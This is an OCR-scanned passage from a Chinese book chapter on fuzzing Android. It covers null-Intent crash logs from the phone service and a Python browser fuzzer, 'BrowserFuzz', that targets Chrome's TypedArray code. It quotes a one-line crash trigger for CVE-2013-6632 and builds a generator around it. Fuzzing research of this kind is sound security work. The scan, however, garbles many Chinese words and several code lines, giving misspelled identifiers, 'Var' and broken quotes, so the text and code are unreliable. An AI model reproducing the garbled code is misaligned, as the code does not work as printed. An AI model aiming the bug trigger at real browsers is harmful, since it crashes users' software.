times: killing! 


I/Process ( 5605): Sending signal. PID: 5605 SIG: 9 


) 
I/ServiceManager (81): service 'simphonebook' died 
I/ServiceManager (81): service 'iphonesubinfo' died 
I/ServiceManager(81): service 'isms' died 
I/ServiceManager\( 81): service 'sip' died 
I/ServiceManager\( 81): service 'phone' died 


I/ActivityManager( 249): Process com.android.phone (pid 5605) has died. 
W/ActivityManager( 249): Scheduling restart of crashed service 
com.android.phone/.TelephonyDebugService in 1250ms 

W/ActivityManager( 249): Scheduling restart of crashed service 
com.android.phone/.BluetoothHeadsetService in 11249ms 

V/PhoneStatusBar( 327): setLightson (true) 

I/ActivityManager( 249): Start proc com.android.phone for restart 
com.android.phone: pid=5638 uid=1001 gids={3002, 3001, 3003, 1015, 1028} 








可 以 看 到 ， 这 个 接收 者 抛 出 了 一 个 空 指针 异常 Nu11PointerException。 这 种 情况 下 ， 主 
线程 终止 ，ActivityManager 向 包 com.androigd.phone 发 送 了 SIGKILL 信号 ， 导 致 eR 
phone、isms 以 及 相关 的 Content Provider ( 如 处 理 短信 的 ) 进程 都 被 终止 ， 并 且 弹 出 了 熟悉 的 
强制 关闭 窗口 ， 如 图 6-1 所 示 。 
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Unfortunately, the process com. 
android.phone has stopped. 


Report OK 











图 6-1 来 自 com.androiq.phone 的 强制 关闭 窗口 


尽管 不 是 特别 华丽 , 快速 的 空 Intent fuzzing 方法 有 效 地 发 现 了 一 个 使 电话 应 用 月 淡 的 简单 方 
法 。 乍 看 上 去 , 这 似乎 只 是 用 户 的 一 个 临时 烦恼 , 但 事实 并 非 如 此 。 随 后 ,rild 收 到 一 个 SIGFPE 
言 号 ， 表 明 发 生 了 一 个 算数 运算 错误 。 大 部 分 情况 下 是 除 零 错误 ， 进 而 导致 崩 省 生成 了 转 储 ， 并 
写 人 日 志和 莫 石 (tombstone ) 文件 。 下 面 列 出 了 崩溃 日 志 中 的 相关 细节 。 


类 和 























Build fingerprint: 
'google/soju/crespo:4.1.2/JZ054K/485486:user/release-keys' 





pid: 5470, tid: 5476, name: rild >>> /system/bin/rild <<< 
signal 8 (SIGFPE), code -6 (?), fault addr 0000155e 

r0 00000000 r1 00000008 2 00000001 rr3 0000000a 

r4 402714d4 rr5 420973f8 rr6 0002elc6 r7 00000025 

r8 00000000 r9 00000000 sl 00000002 fp 00000000 

ip fffd405c sp 40773cb0 lr 40108ac0 pc 40106cc8 cpsr 20000010 
backtrace: 

#00 pc 0000dcc8 /system/lib/libc.so (kill+12) 

#01 pc 0000fabc /system/lib/libc.so (_ aeabi ldiv0+8) 


#02 pc 0000fabc /system/lib/libc.so (_ aeabi ldiv0+8) 


从 骨 省 报告 中 的 回溯 信息 中 ， 可 以 看 到 这 个 错误 与 libc.so 中 的 1daiv0 函数 有 关 ， 正 是 这 个 
函数 调用 了 kil11l 函数 ,熟悉 Android 的 读者 应 该 知道 rild 和 com.android.phone 应 用 的 关系 ， 
我 们 也 会 在 第 11 章 详细 讨论 。 我 们 简单 的 模糊 测试 发 现 ， 这 个 Broadcast Receiver 组 件 对 其 他 
Android 基础 核心 组 件 有 着 某 种 作用 。 尽 管 这 种 空 Intent fuzzing 技术 可 能 无 法 发 现 可 以 利用 的 漏 
洞 ， 但 是 这 是 一 个 寻找 弱 输 入 验证 端点 的 好 例子 。 这 些 端点 值得 进一步 探索 。 


6.4 对 Android 上 的 Chrome 进行 模糊 测试 


Android 浏览 器 是 个 十 分 吸引 人 的 模糊 测试 对 象 ， 原 因 有 很 多 。 首 先 ， 它 是 Android 的 标准 
组 件 , 所 有 Android 设备 上 都 会 有 。 其 次 ，Android 浏览 器 由 Java、JNI、C++ 和 C 语言 编写 。Web 
浏览 器 需要 专注 于 性 能 ,所 以 大 部 分 代码 是 用 本 机 原生 语言 实现 的 。 也 许 是 由 于 浏览 器 的 复杂 性 ， 
浏览 需 引 擎 中 已 经 暴露 出 很 多 漏洞 ， 而 Android 所 采用 的 WebKit 引擎 尤其 如 此 。 开 始 对 Android 
浏览 器 进行 模糊 测试 是 非常 容易 的 , 因为 它 的 外 部 依赖 关系 很 少 , 只 需要 Android 调试 桥 (ADB ) 
环境 。Android 使 处 理 输入 的 自动 化 变 得 非常 简单 。 最 重要 的 是 ， 如 第 5 章 所 述 ，Web 浏览 器 
于 其 支持 的 技术 较 多 ， 暴 露出 的 攻击 面 的 广度 令 人 惊讶 。 
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本 节 会 介绍 一 个 针对 浏览 需 的 初级 模糊 测试 工具 BrowserFuzz。 这 个 工具 针对 Android 版 
Chrome 浏览 器 的 泻 染 引 敬 ， 后 者 是 一 个 底层 的 依赖 库 。 与 其 他 模糊 测试 类 似 ，BrowserFuzz 的 目 
标 就 是 用 畸形 的 输入 去 测试 Chrome 的 代码 。 另 外 ， 本 节 也 会 解释 如 何 选择 测试 的 技术 ， 如 何 生 
成 输入 ,如何 传 递 输入 ， 以 及 如 何 监 控 骨 演 。 为 了 便于 讨论 ， 本 节 会 引用 一 些 代码 片段 ， 完 整 代 
码 可 以 到 本 书 的 官方 网 站 下 载 。 


6.4.1 选择 一 种 技术 作为 目标 


浏览 器 庞大 而 复杂 ， 确 定 测试 的 具体 内 容 是 非常 具有 挑战 性 的 。 浏 览 器 支持 的 技术 非常 多 ， 
你 无 法 开发 一 款 能 够 测试 所 有 这 些 功能 的 模糊 测试 工具 。 即便 你 开发 出 了 这 么 一 个 全 功能 的 测试 
工具 ， 也 很 难得 到 一 个 满意 的 代码 覆盖 率 。 因 此 ， 专 注 于 浏览 器 的 一 个 小 部 分 才 是 最 好 的 选择 ， 
例如 只 测试 SYG、XSLT, 或 者 专注 于 测试 两 种 技术 ( 如 JavaScript 和 HTML ) 之 间 的 交互 情况 。 

对 浏览 器 进行 模糊 测试 , 选择 将 浏览 器 的 哪 一 部 分 作为 测试 对 象 是 最 重要 的 一 步 。 那些 拥有 
很 多 特性 而 且 尚未 被 其 他 人 审计 过 的 部 分 会 是 一 个 比较 好 的 选择 。 例 如 , 对 闭 源 组 件 进行 人 工 审 
计 很 难 , 但 是 对 其 做 模糊 测试 则 十 分 简单 。 选 择 模 糊 测 试 目 标 时 另 一 个 需要 考虑 的 因素 是 文档 是 
否 充分 ， 文 档 越 少 的 部 分 实现 可 能 越 差 ， 就 越 容 易 找 到 前 溃 。 

在 选择 要 测试 的 技术 前 , 要 尽 可 能 地 去 了 解 浏览 器 支 持 哪 些 技 术 。 有 一 些 介绍 浏览 器 兼容 性 
的 网 站 ， 如 http://mobilehtml5.org 和 http://caniuse.com/， 上 面 列举 了 各 个 浏览 器 分 别 支 持 的 技术 。 
当然 , 终极 资源 是 源码 本 身 , 但 是 如 果 没 有 源码 ， 对 程序 做 一 些 逆 向 工程 也 可 以 为 开发 模糊 测试 
工具 提供 很 大 的 帮助 。 深入 研究 目标 技术 , 或 者 审查 以 前 在 目标 代码 或 类 似 代码 中 发 现 的 bug 或 
漏洞 也 是 很 有 价值 的 。 总 的 来 说 ， 收 集 的 信息 越 多 ， 越 能 帮助 你 作出 明智 的 判断 。 

简单 起 见 ， 我 们 决定 专注 于 HTML5。 这 一 规范 代表 了 第 5 代 Web 浏览 器 技术 的 核心 语言 。 
在 写作 本 书 时 ，HTML5 还 非常 年 轻 ， 才 刚刚 成 为 W3C 的 建议 标准 。 即 便 如 此 ，HTML5 已 经 成 
为 了 最 丰富 、 包 含 最 广 的 HTML 版 本 , 直接 支持 <video> 和 <audio> 等 标签 ,甚至 支持 <canvas> 
标签 ， 即 可 以 用 编程 实现 图 形 的 绘制 和 演 染 。HTML5 的 丰富 性 源 自 其 对 脚本 的 重度 依赖 ， 而 脚 
本 使 极其 绚丽 的 动态 内 容 成 为 可 能 。 

这 里 我 们 专注 于 一 个 最 新 加 到 Android 版 Chrome 浏览 器 上 的 HTMLS 特性 : 类 型 数组 。 开 
发 者 可 以 使 用 本 机 原生 语言 当中 的 类 型 来 分 配 和 访问 内 存 。 考 虑 以 下 代码 片段 : 

Var arr = new Uint8Array (16); 


for (var n = 0; n < arr.length; n++) { 
疙 1 













































































































































































: 

上 述 代 码 创 建 了 一 个 包含 16 个 元 素 的 数组 ， 并 把 其 中 的 元 素 初始 化 成 数字 0~15。 浏 览 器 存 
储 这 个 数组 的 方式 跟 native 语言 当中 的 无 符号 字符 类 型 一 样 。 下面 列 出 了 本 机 原生 语言 中 的 表示 
方式 : 

00 01 02 03 04 05 06 07 08 09 0a ob 0c oa 0e Of 


在 上 面 的 代码 中 ,数组 中 的 数据 十 分 紧凑 地 存储 在 内 存 中 ,这 使 得 数据 传递 到 底层 代码 的 时 候 ， 
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可 以 直接 使 用 原生 表示 进行 方便 、 高 效 地 操作 。 图 形 处 理 库 就 是 一 个 很 好 的 例子 , 这 些 类 型 数组 的 
数据 无 须 在 JavaScript 表示 和 原生 表示 之 间 来 回转 换 ， 浏 览 器 就 可 以 极 大 地 提高 效率 和 性 能 。 

在 2013 年 的 Pwn2Own 移动 终端 竞赛 当中 ,研究 人 员 Pinkie Pie 成 功 地 演示 了 如 何 攻破 搭载 
当时 最 新 Android 4.3 系统 的 Nexus 4 上 的 Chrome。 不 久之 后 ，Pinkie Pie 所 利用 的 漏洞 就 被 修补 
并 提交 到 了 开源 代码 仓库 。MWR Labs 的 Jon Butler 进一步 分 析 之 后 ， 发 现 V8 JavaScript 引擎 中 
类 型 数组 的 实现 发 生 了 一 个 小 变化 ， 于 是 他 在 Twitter 上 发 了 一 条 消息 ， 给 出 了 触发 这 个 漏洞 的 


最 短 代 码 ， 如 图 6-2 所 示 。 
Jon Butler WB Follow 
securitea 


Trigger for the bug (fixed): x = new 
Float64Array({length: Ox24924925}) 




















填 Repy 锯 Retweet 人 Favorite eee More 


° 是 人 国 国 口 
RETWEETS FAVORITES 


4:48 AM- 16 Nov 13 














图 6-2 触发 CVE-2013-6632 漏洞 的 最 短 代 码 


看 到 这 段 验证 代码 之 后 ， 我 们 受到 启发 ， 想 到 开发 一 个 模糊 测试 工具 来 进一步 测试 Android 
类 型 数组 的 实现 代码 。 如 果 这 个 问题 还 在 , 那 我 们 可 能 会 发 现 隐藏 在 背后 的 更 进一步 的 问题 。 现 
在 我 们 已 经 选 好 了 目标 ， 可 以 开始 编写 代码 进行 测试 了 。 


6.4.2 ”生成 输入 


下 一 步 就 是 编写 代码 来 生成 测试 用 例 。 与 基于 变异 的 非 智能 模糊 测试 的 方法 不 同 , 我 们 采用 
生成 式 方法 。 从 Jon Butler 公布 的 这 一 最 短 概念 验证 代码 ， 我 们 可 以 开发 出 一 个 初步 的 页 面 生成 
器 。 每 个 页 面 引 用 了 一 些 相同 的 代码 , 这些 代 码 在 页 面 加 载 完毕 之 后 立即 执行 一 个 Javacript 函数 。 
然后 ， 我 们 在 这 个 函数 中 随机 生成 一 些 JavaScript 代码 来 测试 类 型 数组 的 功能 。 这 样 ， 生 成 式 算 
法 的 核心 部 分 就 在 于 生成 这 个 JavaScript 函数 体 本 身 。 

首先 ,我们 将 最 短 的 触发 代码 拆 分 成 两 个 独立 数组 的 创建 语句 。 在 概念 验证 代码 中 , 第 一 个 
数组 是 一 个 传统 的 JavaScript 数组 ， 在 创建 时 被 分 配 一 个 国定 的 长 度 。 数 组 元 素 的 默认 值 为 0。 
这 个 数组 的 创建 在 Jon Butler 的 概念 验证 代码 中 被 让 套 了 , 但 实际 上 可 以 将 其 分 开 。 经 过 分 拆 后 ， 
代码 变 成 了 : 

Var arrl = new Array (0x24924925) ; 

Var arr2 = new Float64Array (arr1) 


在 我 们 的 模糊 测试 工具 中 ， 我 们 采用 上 述 写法 ， 这 样 我 们 就 可 以 把 传统 的 JavaScript Array 
类 型 换 掉 ， 来 尝试 其 他 的 类 型 数组 类 型 。 
我 们 使 用 如 下 代码 来 生成 第 一 个 数组 : 
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45 page += " try { " + generate var() + " } catch(e) { console.log(e); 
yt 


这 里 ，generate_var 函数 用 于 创建 第 一 个 数组 。 我 们 把 第 一 条 语句 放 在 一 个 try-catch 
块 中 ,并 且 把 异常 输出 到 浏览 器 的 控制 台中 。 这 种 方法 会 帮助 我 们 很 快 找到 生成 代码 产生 的 问题 。 
generate_var 也 数 的 代码 如 下 所 示 : 


64 def generate var(): 




















65 vtype = random.choice (TYPEDARRAY_TYPES ) 
66 vlen = rand_num() 
67 return "Var arrl = new %s(%$d);" %$ (vtype, vlen) 





静态 数组 TYPEDARRAY_TYPES 中 包含 了 所 有 支持 的 类 型 ， 我们 首先 从 中 随机 选择 一 个 作为 
类 型 数组 的 类 型 。 然 后 ,我们 用 rand_num 函数 随机 选 定 一 个 数组 长 度 。 最后, 我 们 使 用 上 面 选 
定 的 类 型 和 长 度 来 生成 创建 第 一 个 数组 的 语句 。 

现在 我 们 来 关注 第 二 个 数组 的 生成 。 第 二 个 数组 在 创建 时 分 配 了 与 第 一 个 数组 相同 的 长 度 。 
第 一 个 数组 的 长 度 是 触发 这 个 漏洞 的 关键 有 两 个 原因 。 其 一 , 计算 第 二 个 数组 所 需 分 配 的 内 存 
时 发 生 了 整数 溢出 ; 其 二 ,这 个 长 度 需要 绕 过 某 些 整数 溢出 检查 的 验证 ， 有 漏洞 的 代码 给 出 的 验 
证 是 错误 的 。 下 面 就 是 生成 第 二 个 数组 的 部 分 代码 : 


49 page += " try { " + generate assignment () + 
" }catch(e){ console.log(e); }\n" 


与 创建 第 一 个 数组 类 似 ， 我 们 在 外 面包 衰 了 try-catch 块 ， 这 次 没有 使 用 generate_var 
函数 ， 而 是 使 用 了 一 个 generate_assignment 国 数 。 代 码 如 下 所 示 : 


69 def generate_assignment () : 
70 vtype = random.choice (TYPEDARRAY_TYPES ) 
71 return "Var arr2 = new %s(arrl);" % (vtype) 


这 个 函数 更 加 简单 ， 因 为 我 们 无 需 生 成 一 个 随机 长 度 。 我 们 仅仅 是 选择 一 个 随机 类 型 并 用 
它 作 为 类 型 数组 的 类 型 生成 第 二 个 数组 。 

在 我 们 的 模糊 测试 工具 中 ，rang_num 函数 是 非常 严格 的 。 最 短 漏洞 触发 代码 使 用 了 一 个 非 
常 大 的 数 。 为 了 生成 类 似 的 值 ， 我 们 对 它 的 算法 稍 作 修改 如 下 ; 

def rangd_ num(): 


divisor = random.randrange (0x8) + 1 
dividend = (0x100000000 / divisor) 
























































if random.randrange(3) == 0: 
addend = random.randrange (10) 
addengd -= 5 


Qividend += addend 
return dividend 


首先 从 1~8 中 选 一 个 数 作为 除数 。 不 能 用 0， 因 为 除 0 错误 会 导致 模糊 测试 工具 月 演 。 也 不 
用 大 于 8 的 数 ， 因 为 8 字 节 是 类 型 数组 的 元 素 的 最 大 长 度 ( Float64Array )。 然 后 我 们 用 这 个 
随机 的 除数 去 除 2”。 这样, 整个 数组 的 总 长 度 更 容易 触发 整数 溢出 。 最后, 我们 以 大 约 1/3 的 概 
率 去 加 上 一 个 -5~4 内 的 数 ， 这 能 够 帮助 我 们 测试 一 些 发 生 了 整数 溢出 ， 但 并 没有 产生 错误 的 极 
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最 后 , 我 们 根据 规范 构造 一 个 类 型 数组 类 型 列表 。 规范 的 链接 在 附录 C 中 可 以 找到 。 我 们 把 
这 些 类 型 放 进 Python 的 全 局 变量 TYPEDARRAY_TYPES 中 ,generate var 和 generate_ 
assignment 函数 都 用 过 这 个 变量 。 我 们 把 生成 的 JavaScript 函数 与 其 余 引 用 的 代码 相 结 合 ， 就 
得 到 了 可 以 用 来 测试 类 型 数组 实现 的 HTML5 页 面 。 现 在 我 们 完成 了 输入 生成 的 任务 ， 可 以 开始 
用 Android 设备 去 处 理 它 了 。 


6.4.3 ”处 理 输入 


现在 我 们 的 浏览 咒 模 糊 测试 工具 可 以 生成 一 些 有 趣 的 输入 了 ,下 一 步 就 是 让 浏览 器 去 处 理 它 
们 。 尽 管 这 一 步 往 往 是 最 难 实现 的 ， 但 是 如 果实 现 不 好 ， 你 的 模糊 测试 工具 将 无 法 实现 自动 化 。 
浏览 器 以 统一 资源 定位 符 (URL ) 为 输入 ， 本 章 不 会 深入 介绍 URL 的 构造 、 解 析 的 知识 。 最 重 
要 的 是 ，URL 会 告诉 浏览 器 使 用 什么 协议 来 获取 输入 。 基 于 选 定 的 协议 ， 相 应 的 输入 就 会 传递 

BrowserFuzz 使 用 HTTP 协议 来 传递 输入 。 其 他 协议 (如 file:WURL ) 可 能 也 可 以 用 来 传递 输 
入 , 但 我 们 在 这 里 不 研究 它 。 我 们 用 Twisted 这 个 Python 框架 构造 一 个 初级 的 HTTP 服务 器 来 传 
递 输入。 相关 代码 如 下 : 


13 from twisted.web import server, resource 
14 from twisted.internet import reactor 
































83 class FuzzServer (resource.Resource): 





84 isLeaf = True 

85 page = None 

86 def render_GET(self, request): 

87 path = request.postpath[0] 

88 if .path == "favicon. Loor.: 

89 request.setResponseCode (404) 

90 return "Not found" 

91 self.page = generate page() 

32 return self.page 

93 

94 if name., == " main 

95 # Start the HTTP server 

96 server_thread = FuzzServer() 

97 reactor.listenTCP (LISTEN_PORT, server.Site(server_ thread)) 
98 threading.Thread (target=reactor.run, args=(False,)).start!() 


这 个 HTTP 服务 器 十 分 简单 ， 只 能 响应 GET 请 求 ， 而 且 对 于 返回 结果 几乎 没有 什么 逻辑 。 
请 求 favicon 图 标 时 ， 会 返回 一 个 404 错误 来 告诉 浏览 器 这 个 文件 无 法 访问 。 对 于 其 他 的 请 求 ， 
浏览 器 会 永远 返回 一 个 生成 的 页 面 。 作 为 模糊 测试 工具 的 一 个 主要 部 分 ，HTTP 服务 器 在 自己 的 
后 台 线 程 中 运行 。 由 于 有 Twisted 框架 ， 无 须 做 其 他 工作 就 能 把 生成 的 页 面 架 设 起 来 。 

HTTP 服务 器 运行 起 来 后 ， 为 了 实现 自动 化 我 们 还 需要 做 一 件 事 情 ， 就 是 操纵 浏览 器 去 不 断 
地 加 载 相 应 URL 的 页 面 。 由 于 有 ActivityManager， 在 Android 上 实现 这 一 步 是 十 分 容易 的 。 使 
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用 am 命令 发 送 一 个 Intent, 你 就 可 以 持续 不 断 地 启动 浏览 器 并 指定 它 打开 任何 页 面 ,BrowserFuzz 
中 的 execute_test 国 数 代 码 如 下 : 


57 tmpuri = "fuzzyou?id=%d" % (time.time() 

58 output = subprocess.Popen([ 'adb', 'shell', 'am', 'start', 

59 '-a', 'android.intent.action.VIEW', 

60 '-d', "http:;//%s:%d/%Ss' % (LISTEN HOST, LISTEN_PORT, 
tmpuri), 

61 '-e', 'Ccom.android.browser.application id', 'wooo', 

62 'com.android.chrome' 

63 ], stdout=subprocess.PIPE, 


stderr=subprocess.STDOUT) .communicate() [0] 

第 57 行 代码 在 请 求 的 URL 中 添加 了 时 间 字 符 串 ,这 是 为 了 让 浏览 器 每 次 请 求 一 个 新 的 内 容 ， 
而 不 是 重用 缓存 中 的 内 容 。 第 58 行 ~ 第 63 行 代码 通过 ADB 在 Android 设备 上 来 执行 am 命令 。 

BrowserFuzz 中 所 使 用 的 命令 比较 长 ， 我 们 来 解释 一 下 。am 命令 的 start 子 命令 用 来 启动 
Acticity, 后 面 是 几 个 Intent 选项 。-a 开关 指定 了 Intent 的 动作 (andqroid.intent.action.VIEW )。 
这 个 动作 让 ActicityManager 决定 如 何 处 理 请 求 , 然 后 进一步 根据 -a 开关 来 获取 请 求 相 关 的 数据 。 
BrowserFuzz 让 ActicityManager 启动 默认 浏览 器 ,并 且 使 用 我 们 的 HTTP 服务 器 的 URL 作为 数据 。 
接 下 来 ，-e 开关 为 Chrome 提供 了 extra 数据 ,， 把 com.angdroid.browser.application_id 
设 为 wooo, 这 样 做 是 为 了 每 次 都 在 同一 个 标签 页 中 打开 页 面 , 而 不 是 每 次 打开 一 个 新 的 标签 页 。 
这 一 点 很 重要 ， 因 为 创建 非常 多 的 标签 页 会 导致 内 存 过 度 使 用 ,进而 导致 浏览 器 重启 ,这样 会 浪 
费 更 多 的 时 间 。 而 且 , 浏览 器 重启 时 去 打开 之 前 的 测试 用 例 并 不 会 对 寻找 bug 带 来 帮助 ， 因 为 之 
前 的 输入 已 经 被 测试 过 了 。 命 令 的 最 后 一 部 分 指定 的 是 要 启动 的 程序 包 名 ， 这 里 使 用 的 是 
com.androigd.chrome， 换 成 其 他 浏览 右 当 然 也 是 可 行 的 。 例 如 ， 可 以 使 用 包 和 名 com.google. 
android.browser 来 启动 Galaxy Nexus 手机 上 的 Android 浏览 器 。 

BrowserFuzz 的 目的 是 自动 测试 大 量 输入 ， 因 此 最 后 一 步 就 是 把 上 面 的 执行 测试 步骤 放 入 一 
个 简单 的 循环 中 ， 代 码 如 下 : 
































































































































45 def run(self): 
46 while self.keep_ going: 
47 self.execute_test () 

















只 要 keep_going 标志 为 真 ， BrowserFuzz 就 会 连续 执行 这 一 测试 。 接 下 来 的 工作 就 是 去 监 
视 那 些 异 常 行为 。 
6.4.4 ”监控 测试 

本 章 前 面 讲 过 , 想 要 知道 是 否 发 现 了 有 价值 的 东西 ， 监 视 目 标 程序 是 十 分 必要 的 。 尽管 监视 
技术 有 很 多 ,但 BrowserFuzz 使 用 一 种 极为 简化 的 方法 。 

回忆 一 下 第 2 章 ，Android 系统 中 可 以 使 用 logcat 命令 来 获取 系统 日 志 。 这 个 命令 在 所 有 
Android 设备 中 都 有 ， 并 且 可 以 直接 通过 ADB 来 使 用 。Android 系统 中 也 包含 一 个 特殊 的 系统 进 
程 debuggerd。 当 一 个 进程 月 演 后 ，debuggerd 会 把 崩溃 信息 写 人 系统 日 志 。BrowserFuzz 依靠 这 
两 个 工具 进行 监视 。 
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在 启动 Chrome 之 前 ， 首 先 清空 系统 日 志 ， 代 码 如 下 : 

54 subprocess.Popen([ 'adb'，'logcat'，'-c! ]).wait() # 清空 日 志 

与 之 前 一 样 ， 我 们 使 用 Python 函数 subprocess .Popen 来 执行 adb 命令 。 这 里 我 们 使 用 
logcat 命令 ， 传 人 -c 参数 来 清空 日 志 。 

接 下 来 ,打开 浏览 器 访问 HTTP 服务 器 后 ,我 们 给 浏览 器 留 一 些 时 间 来 处 理 生 成 的 输入 。 这 
里 我 们 使 用 Python 的 time. sleep 限 数 : 

65 time.sleep(60) # 给 设备 留 一 些 时 间 ， 希 望 能 够 触发 前 渍 

我 们 给 了 Chrome 足够 长 的 时 间 来 处 理 我 们 构造 的 输入 。 我 们 故意 设置 60 秒 这 样 一 个 很 长 的 
时 间 ， 因 为 浏览 需 处 理 类 型 数组 可 能 会 很 耗 时 ， 尤 其 是 对 于 性 能 较 低 的 设备 而 言 。 

下 一 步 就 是 检查 系统 日 志 ， 看 看 是 否 发 生 了 什么 。 我 们 再 次 使 用 aab logct 命令 : 


68 log = Subprocess.Popen([ 'adb', 'logcat', '-d' ], # dump 
69 stdout=subprocess .PIPE, 
stderr=subprocess.STDOUT) .communicate() [0] 


这 次 我 们 传人 -da 参数 来 通过 logcat 获取 系统 日 志 的 内 容 。 我 们 设置 了 subprocess .Popen 
函数 当中 staout 和 stderr 的 选项 , 并 使 用 conmmunicate 函数 来 把 命令 A 的 输出 传人 1og 分 变量 。 
最 后 ， 我 们 用 下 面 的 代码 来 检查 日 志 内 容 : 


3 





















































72 if log.find('SIGSEGV') != -1: 

33 crashfn = os.path.join('crashes', tmpuri) 

74 print " Crash!! Saving page/log to %s" 多 crashfn 
3 with open(crashfn, "wb") as f: 

76 f.write(self.server.page) 

了 with open(crashfn + '.log', "wb") as f: 

78 f.write(1log) 


从 内 存 破 坏 漏洞 的 角度 来 看 ， 段 错误 ( segmentation violation ) 是 最 吸引 人 的 ， 这 种 情况 下 ， 
系统 日 志 中 会 包含 字符 串 sIGSEGV。 如 果 我 们 在 系统 日 志 中 没有 找到 这 一 字符 串 ， 我 们 忽略 这 
一 输入 ,继续 尝试 。 如 果 我 们 找到 了 这 一 字符 串 ， 那么 我 们 就 可 以 确定 ， 在 模糊 测试 过 程 中 发 生 
了 一 个 段 错误 类 型 的 月 演 。 

监测 到 崩溃 后 ,我们 把 系统 日 志 信息 和 造成 月 省 的 输入 存 到 本 地 ,用 于 后 续 分 析 ,， 这样 我 们 
就 能 够 让 模糊 测试 工具 继续 不 间断 地 运行 。 

为 了 验证 这 个 模糊 测试 工具 的 有 效 性 ,我 们 将 它 运 行 了 7 天 。 基本 测试 设备 是 搭载 Android 4.4 
系统 的 2012 版 Nexus 7， 并 且 使 用 Pwn2Own 2013 中 所 使 用 的 Chrome 版 本 。 这 个 版 本 的 获取 方 
法 是 ， 打 开 Google Play 商店 ， 依 次 选择 Settings ( 设置 ) >Apps (应 用 ) 选项 ， 印 载 应 用 的 更 新 
并 且 禁 用 更 新 。 版 本 信息 如 下 : 


W/google-breakpad(12273): Chrome build fingerprint: 
W/google-breakpad(12273): 30.0.1599.105 
W/google-breakpad(12273): 1599105 
W/google-breakpad (12273) 


: cal917fb-f257-4e63-b7a0-c3clbc24f1aqa 
在 模糊 测试 过 程 中 , 将 系统 日 志 显 示 在 另外 的 窗口 中 ,这样 可 以 监视 测试 的 过 程 。 我 们 观察 















































AS 让- 
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到 ， 一 些 类 型 数组 的 类 型 在 Android 版 的 Chrome 中 是 不 支持 的 ， 相 应 的 输出 如 下 : 
I/chromium( 1690): [INFO:CONSOLE(10)] "ReferenceError: ArrayBufferView 


is not defined", source: 
ES 


I/chromium( 
defined", 


http://10.0.10.10:31337/fuzzyou?id=1384731354 (10) 


1690): 
source: 


[INFO:CONSOLE(10)] "ReferenceError: StringView is not 
http://10.0.10.10:31337/fuzzyou?id=1384731406 (10) 


注释 掉 这 些 不 支持 的 类 型 会 提高 模糊 测试 的 效率 。 如 果 不 去 监视 系统 日 志 , 我 们 就 会 忽略 这 
一 点 ， 从 而 会 对 测试 周期 造成 不 必要 的 浪费 。 

在 测试 过 程 中 产生 了 上 百 个 月 演 ,大 多 数 朋 演 
其 中 一 个 朋 溃 的 输出 如 下 : 

Builgd fingerprint : 

KeysS 

Revision: '0' 


pid: 28335, tid: 28349, name: ChildProcessMai 
com.android.chrome:sandboxed process3 <<< 























是 空 指针 引用 错误 ,还 有 一 些 是 内 存 不 足 错误 。 


'google/nakasi/grouper:4.4/KRT160/907817:user/release- 


> 


signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 00000000 
r0 00000000 1 00000000 2 c0000000 r3 00000000 
r4 00000000 r5 00000000 Xr6 00000000 r7 00000000 
r8 6ad79f28 rr9 37a08091 sl 684e45d4 fp 6ad79filc 
ip 00000000 sp 6ad79e98 1r 00000000 pc 4017036c cpsr 80040010 





除 此 之 外 , 产生 的 一 些 崩 演 点 引用 了 0xbbadbeef 这 个 地 址 。 
Chrome 中 的 其 他 严重 错误 相关 。 日 志 示 例如 下 : 


pid: 11212, tid: 11230, name: ChildProcessMai 
com.android.chrome:sandboxed process10 <<< 


这 个 特殊 地 址 与 内 存 分 配 失败 及 


or 





signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr bbadbeef 

r0 6ad79694 rl fffffffe r2 00000000 rr3 bbadbeef 

r4 6c499e60 r5 6c47e250 Ir6 6ad79768 rr7 6ad79758 

r8 6ad79734 rr9 6ad79800 sl 6ad79b08 fp 6ad79744 

ip 2bde4001 sp 6ad79718 1]r 6bab2c1ld pc 6bab2c20 cpsr 40040030 
最 后 ， 少 数 几 次 骨 溃 日 志 如 下 : 
pid: 29030, tid: 29044, name: ChildProcessMai >>> 


com.android.chrome:sandboxed processl1l1 <<< 


signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 93623000 
r0 6dq708091 rl1 092493fe rr2 6eb3053d rr3 6ecfe008 
r4 24924927 rr5 049249ff r6 6ac01f64 r7 6d708091 
r8 6d747a09 r9 93623000 sl 5a3bb014 fp 6ac01f84 
ip 6d8080ac sp 6ac01f70 lr 3dd657e8 pc 3dd63db4 cpsr 600e0010 


这 种 骨 淡 与 Jon Butler 的 概念 验证 代码 所 产生 的 朋 演 极其 相似 。 

这 个 模糊 测试 工具 展示 了 模糊 测试 是 多 么 快速 和 简单 。 虽 然 只 有 一 两 百 行 Python 代码 ,但 
BrowserFuzz 能 够 很 好 地 测试 Chrome 中 的 TypedArrays 功能 ， 不 仅 重 新 发 现 了 Pinkie Pie 赢得 
Pwn2Own 移动 终端 竞赛 时 所 使 用 的 严重 漏洞 ， 而 且 还 发 现 了 一 些 不 那么 严重 的 bug。 这 个 工具 
同时 也 说 明 ， 把 精力 专注 于 测试 少 部 分 的 功能 可 以 提高 效率 ， 从 而 更 有 可 能 找到 漏洞 。 
BrowserFuzz 也 提供 了 一 个 模糊 测试 框架 ， 相 信 读 者 可 以 很 容易 地 用 它 测试 浏览 器 的 其 他 功能 。 
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6.5 ”对 USB 攻击 面 进行 模糊 测试 


第 5 童 讨论 了 Android 设 备 的 USB 接口 暴露 了 很 多 不 同 的 功能 。 其 实 , 每 个 功能 本 身 就 代表 
着 一 个 攻击 面 。 尽管 使 用 这 些 功能 需要 实际 接触 设备 , 但 是 如 果 底 层 代 码 有 漏洞 ,就 可 以 绕 过 一 
些 安全 机 制 ， 如 锁 屏 、 受 保护 的 ADB 接口 等 。 从 USB 接口 发 起 攻击 的 可 能 影响 包括 从 设备 中 读 
取 数 据 、 往 设备 中 写 和 人 数据、 任意 代码 执行 ， 以 及 重 写 设备 固件 的 某 些 部 分 等 。 这 些 风险 使 得 
USB 接口 的 攻击 面 成 为 一 个 吸引 人 的 模糊 测试 对 象 。 

USB 设备 主要 分 为 两 类 : 主机 和 设备 。 除了 少数 例外 情况 , Android 设备 一 般 不 能 作为 主机 。 
当 一 个 Android 设备 被 当做 主机 的 时 候 ， 经 常会 用 一 根 OTG ( On-the-Go ) 线 ， 这 种 模式 称 为 
主机 模式 。 由 于 过 去 Android 设备 对 主机 模式 的 支持 变化 无 常 ， 本 节 主 要 对 设备 模式 的 服务 进行 
测试 。 


